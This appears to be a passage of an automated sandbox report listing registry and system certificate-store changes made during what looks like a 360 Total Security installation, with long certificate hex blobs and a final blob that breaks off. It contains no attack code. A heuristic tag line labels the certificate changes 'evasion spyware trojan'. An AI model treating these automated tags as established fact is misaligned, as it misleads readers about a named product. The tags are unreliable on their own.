Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\360Safe\360Scan C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\SD360\ = "{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\ProgID\ = "MenuEx.SD360MN.1" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\VersionIndependentProgID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\360TotalSecurity.ext.1\shell\open\command C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\Cleanup\Icon = "\"C:\\Program Files (x86)\\360\\Total Security\\QHSafeMain.exe\",0" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\Cleanup\command C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\SD360\ = "{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN\CLSID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\ = "SD360MN Class" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\0 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\0\win64\ = "C:\\Program Files (x86)\\360\\Total Security\\MenuEx64.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\TypeLib\Version = "1.0" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\HELPDIR C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\ = "ISD360MN" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\SD360 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\FLAGS\ = "0" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN.1\ = "SD360MN Class" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN.1\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN\CLSID\ = "{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\ProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\TypeLib\ = "{FF9EAEBA-7783-4904-99E3-F3E322C0F648}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\SD360\ = "{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\Programmable C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\SD360\ = "{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN.1 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\ = "MenuEx 1.0 Type Library" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\.TotalSecurity\ = "360TotalSecurity.ext.1" C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN\CurVer\ = "MenuEx.SD360MN.1" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\360TotalSecurity.ext.1\shell\open\command\ = "\"C:\\Program Files (x86)\\360\\Total Security\\safemon\\QHSafeTray.exe\" %1" C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN.1\CLSID\ = "{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\InprocServer32\ = "C:\\Program Files (x86)\\360\\Total Security\\MenuEx64.dll" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\0\win64 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN\CurVer C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\TypeLib\ = "{FF9EAEBA-7783-4904-99E3-F3E322C0F648}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\360TotalSecurity.ext.1\shell\open C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\Cleanup C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\Cleanup\command\ = "\"C:\\Program Files (x86)\\360\\Total Security\\QHSafeMain.exe\" /runclean" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\VersionIndependentProgID\ = "MenuEx.SD360MN" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\FLAGS C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FF9EAEBA-7783-4904-99E3-F3E322C0F648}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\360\\Total Security" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\ = "ISD360MN" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\.TotalSecurity C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\SD360 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\360TotalSecurity.ext.1\shell C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\SD360 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MenuEx.SD360MN\ = "SD360MN Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\TypeLib\ = "{FF9EAEBA-7783-4904-99E3-F3E322C0F648}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\TypeLib\Version = "1.0" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\SD360 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B09C75BE-F1AE-47BA-BC47-19F5C0A15B33}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\system32\regsvr32.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\293621028B20ED02F566C532D1D6ED909F45002F C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F00FC37D6A1C9261FB6BC1C218498C5AA4DC51FB\Blob = 030000000100000014000000f00fc37d6a1c9261fb6bc1c218498c5aa4dc51fb090000000100000020000000301e06082b0601050507030106082b0601050507030306082b060105050703080b0000000100000032000000470050004b00490020004100700070006c00690063006100740069006f006e00430041003200200052006f006f00740000002000000001000000fb030000308203f7308202dfa003020102020b3132353337323832383238300d06092a864886f70d01010b05003058310b3009060355040613024a50311c301a060355040a13134a6170616e65736520476f7665726e6d656e74310d300b060355040b130447504b49311c301a060355040313134170706c69636174696f6e43413220526f6f74301e170d3133303331323135303030305a170d3333303331323135303030305a3058310b3009060355040613024a50311c301a060355040a13134a6170616e65736520476f7665726e6d656e74310d300b060355040b130447504b49311c301a060355040313134170706c69636174696f6e43413220526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a6aaad2565d60011d6e87a76aaf4e6b44bf3ccc352b48daca64fb592716f46b5d5ad8b12221725ce45e8147a859ae42310a8fab16750e56d47e06a8913e3aeae35f1f442c505f74d977e3c28fcb026911e8c1e381a96dc58449762e332c8d115414d759878beab68a95eed47bea4ba8ea10297de9374996d67b40525ee94c8edaaa4ba326c4211ebbecb170690e19385c86428ce1f47c7c05d60ee7636dc333b51eb7bcf72d80f78a8198208903e1a988d8eb4cf1536a66eddb7e24d402053d9762ad078ac89f04f8b326d44ea2ebab0a9eb89ddb76f790fab816eb8e68b290b59afb6490d512ca9fd9d286366b87095739ad8fa3b33bc42421b32acb132fb3d0203010001a381c13081be301d0603551d0e0416041456a7acaa021db2ac3d900ea06f2e41c676e77bda300e0603551d0f0101ff040403020106307c0603551d1104753073a471306f310b3009060355040613024a5031183016060355040a0c0fe697a5e69cace59bbde694bfe5ba9c311b3019060355040b0c12e694bfe5ba9ce8aa8de8a8bce59fbae79ba43129302706035504030c20e382a2e38397e383aae382b1e383bce382b7e383a7e383b343413220526f6f74300f0603551d130101ff040530030101ff300d06092a864886f70d01010b050003820101007f9a0975ac07d172742e775730c2049cd480a683e7a5a01b9ffeabf380bdd54aa3a18fb64c6011e7cae16081d748c12059a561328b9d9e97d36683da652e583edbe52fa5cd8c73a651be5828a0795c692f43df63b28947cabbdeb9341163a00e2517e587f41db0b0a5cf41a874c6e853d542f4822d5309116826719475134daa76883c74b1d6e34c4f62c3494c4e6df1707ec37fa605cc789be981dba8c8c75c9efc92922da697f238b56e73950cc03fcea69430b5fa05b7de9e20aafc1364c98aba64efe263e4d898ae6bb53ea655b8333e2c72fb2c1100fb5b162f84d2139efa05c5c1cb724e22dd84ca4bbcd22d861a0476591f4942623b131f16e8bad7fd C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\339B6B1450249B557A01877284D9E02FC3D2D8E9 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2\Blob = 19000000010000001000000091161b894b117ecdc257628db460cc0468000000010000000800000000003db65bd9d5017a000000010000000e000000300c060a2b0601040182375e0102620000000100000020000000e7685634efacf69ace939a6b255b7b4fabef42935b50a265acb5cb6027e44e7009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703010b000000010000004600000056006500720069005300690067006e00200043006c006100730073002000330020005000750062006c006900630020005000720069006d006100720079002000430041000000030000000100000014000000742c3192e607e424eb4549542be1bbc53e6174e2140000000100000014000000e27f7bd877d5df9e0a3f9eb4cb0e2ea9efdb697753000000010000002400000030223020060a2b0601040182375e010130123010060a2b0601040182373c0101030200c01d000000010000001000000027b3517667331ce2c1e74002b5ff22987e0000000100000008000000000010c51e92d2010f0000000100000010000000d7c63be0837dbabf881d4fbf5f986ad82000000001000000400200003082023c308201a5021070bae41d10d92934b638ca7b03ccbabf300d06092a864886f70d0101020500305f310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e31373035060355040b132e436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479301e170d3936303132393030303030305a170d3238303830313233353935395a305f310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e31373035060355040b132e436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f7269747930819f300d06092a864886f70d010101050003818d0030818902818100c95c599ef21b8a0114b410df0440dbe357af6a45408f840c0bd133d9d911cfee02581f25f72aa84405aaec031f787f9e93b99a00aa237dd6ac85a26345c77227ccf44cc67571d239ef4f42f075df0a90c68e206f980ff8ac235f702936a4c986e7b19a20cb53a585e73dbe7d9afe244533dc7615ed0fa271644c652e816845a70203010001300d06092a864886f70d010102050003818100bb4c122bcf2c26004f1413dda6fbfc0a11848cf3281c67922f7cb6c5fadff0e895bc1d8f6c2ca851cc73d8a4c053f04ed626c076015781925e21f1d1b1ffe7d02158cd6917e3441c9c194439895cdc9c000f568d0299eda290454ce4bb10a43df032030ef1cef8e8c9518ce6629fe69fc07db7729cc9363a6b9f4ea8ff640d64 C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D23209AD23D314232174E40D7F9D62139786633A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\23E594945195F2414803B4D564D2A3A3F5D88B8C\Blob = 0b000000010000000e000000740068006100770074006500000009000000010000000c000000300a06082b0601050507030303000000010000001400000023e594945195f2414803b4d564d2a3a3f5d88b8c200000000100000017030000308203133082027ca003020102020101300d06092a864886f70d01010405003081c4310b3009060355040613025a41311530130603550408130c5765737465726e204361706531123010060355040713094361706520546f776e311d301b060355040a131454686177746520436f6e73756c74696e6720636331283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e3119301706035504031310546861777465205365727665722043413126302406092a864886f70d01090116177365727665722d6365727473407468617774652e636f6d301e170d3936303830313030303030305a170d3230313233313233353935395a3081c4310b3009060355040613025a41311530130603550408130c5765737465726e204361706531123010060355040713094361706520546f776e311d301b060355040a131454686177746520436f6e73756c74696e6720636331283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e3119301706035504031310546861777465205365727665722043413126302406092a864886f70d01090116177365727665722d6365727473407468617774652e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100d3a4506ec8ff566be6cf5db6ea0c687547a2aac2da8425fca8f44751da85b5207494861e0f75c9e90861f5066d306e151902e952c062db4d999ee26a0c4438cdfebee3640970c5feb16b29b62f49c83bd427042510972fe7906dc0284299d74c43dec3f5216d549f5dc358e1c0e4d95bb0b8dcb47bdf363ac2b5662212d6870d0203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010405000381810007fa4c695cfb95cc46ee85834d21308ecad9a86f491ae6da51e360706c846111a11ac8483e59437d4f953da18bb70b62987a758add884e4e9e40dba8cc3274b96f0dc6e3b3440bd98a6f9a299b9918283bd1e340289a5a3cd5b5e7201b8bcaa4ab8de951d9e24c2c59a9dab9b2751bf642f2efc7f218f989bca3ff8a232e7047 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\31E2C52CE1089BEFFDDADB26DD7C782EBC4037BD C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A1DB6393916F17E4185509400415C70240B0AE6B C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F517A24F9A48C6C9F8A200269FDC0F482CAB3089 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\9C615C4D4D85103A5326C24DBAEAE4A2D2D5CC97 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\9158C5EF987301A8903CFDAB03D72DA1D88909C9\Blob = 0300000001000000140000009158c5ef987301a8903cfdab03d72da1d88909c9090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308060a2b0601040182370a030406082b0601050507030606082b060105050703070b000000010000003a00000041006300740061006c00690073002000410075007400680065006e007400690063006100740069006f006e002000430041002000470031000000200000000100000098030000308203943082027ca003020102020101300d06092a864886f70d0101050500306a310b3009060355040613024954310f300d06035504070c064d696c616e6f31233021060355040a0c1a416374616c697320532e702e412e2f30333335383532303936373125302306035504030c1c416374616c69732041757468656e7469636174696f6e204341204731301e170d3039303632333134303630305a170d3232303632353134303630305a306a310b3009060355040613024954310f300d06035504070c064d696c616e6f31233021060355040a0c1a416374616c697320532e702e412e2f30333335383532303936373125302306035504030c1c416374616c69732041757468656e7469636174696f6e20434120473130820122300d06092a864886f70d01010105000382010f003082010a0282010100c31c86343f27524260ba2b60d0212bc9d7e940753a6c580f233bcf863ed464ab6edaeac82ad89545dfc91cd225929e10985a8b7169c095e9f66b68dcf7b6c40dfe6ef5703bc1a4a84f20a2270b9ff112757ccfae7f5ecb78025828d72faadba0ae743d7eabf6e972a12acfd69060dfe0a035cac0db04c40756fc66758c8e7a13a13c066b1ae67f399c88e4846fa2e27f6b9fec01aad2c4cbb2ec9a3db81718ac1f609933e6eb05ddccf26967b00ebe282443cb2db9478419f9eae4f1f568f49fc77b5051afa2fc6f778831bf92db7f9cc5b5aca10898e76a33fed1bb00e1b70508aff3a65688363de38a4ae20d9d8086669fd4c2a350ba1c12d7878a314ab8150203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020100301d0603551d0e0416041401bbd69b56b47ee6c558dd2c98f4ca72f65f3386300d06092a864886f70d01010505000382010100a120d6cba2346d3c6ee155d24ad0d9bab23751887727ee0248934541e27551f2199409a0f3b87dba038023a025ef0119b5d91a7a2de3428ab186310f96ec6684f2ce231246966b315e06baafa352aa4220a8d1aeaa9bdfc4179e537001b4a91ada68c8630fb65a7353d16911061352e76ba80531b7b0fc8746c5758881f15f7802e79fad9cbb54ed5f996a37d5eb55b32ac0436051dcb4719226a30fcc7a3ddcc04289172908675464c5f9a844bc847158963d67577fbbac90b37122bf3ebaac66264510b3f01f3a3a68a55035cab4179106012cf70db070b25b5675b97799c0d99585022d736607c94f9911ee5b2ba8e3682305a8f3040f06bb1f098ec65b1d C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob = 190000000100000010000000e53d34cecb05c17ee332c749d78c02560f000000010000001000000065fc47520f66383962ec0b7b88a0821d03000000010000001400000018f7c1fcc3090203fd5baa2f861a754976c8dd2509000000010000000c000000300a06082b060105050703080b000000010000003400000056006500720069005300690067006e002000540069006d00650020005300740061006d00700069006e00670020004300410000001400000001000000140000003edf290cc1f5cc732ceb3d24e17e52dabd27e2f02000000001000000c0020000308202bc3082022502104a19d2388c82591ca55d735f155ddca3300d06092a864886f70d010104050030819e311f301d060355040a1316566572695369676e205472757374204e6574776f726b31173015060355040b130e566572695369676e2c20496e632e312c302a060355040b1323566572695369676e2054696d65205374616d70696e67205365727669636520526f6f7431343032060355040b132b4e4f204c494142494c4954592041434345505445442c20286329393720566572695369676e2c20496e632e301e170d3937303531323030303030305a170d3034303130373233353935395a30819e311f301d060355040a1316566572695369676e205472757374204e6574776f726b31173015060355040b130e566572695369676e2c20496e632e312c302a060355040b1323566572695369676e2054696d65205374616d70696e67205365727669636520526f6f7431343032060355040b132b4e4f204c494142494c4954592041434345505445442c20286329393720566572695369676e2c20496e632e30819f300d06092a864886f70d010101050003818d0030818902818100d32e20f0687c2c2d2e811cb106b2a70bb7110d57da53d875e3c9332ab2d4f6095b34f3e990fe090cd0db1b5ab9cde7f688b19dc08725eb7d5810736a78cb7115fdc658f629ab585e9604fd2d621158811cca7194d522582fd5cc14058436ba94aab44d4ae9ee3b22ad56997e219c6c86c04a47976ab4a636d5fc092dd3b4399b0203010001300d06092a864886f70d01010405000381810061550e3e7bc792127e11108e22ccd4b3132b5be844e40b789ea47ef3a707721ee259efcc84e389944cdb4e61efb3a4fb463d50340b9f7056f68e2a7f17cee563bf796907732eb095288af5edaaa9d25dcd0aca10098fceb3af2896c479298492dcffba674248a69010e4b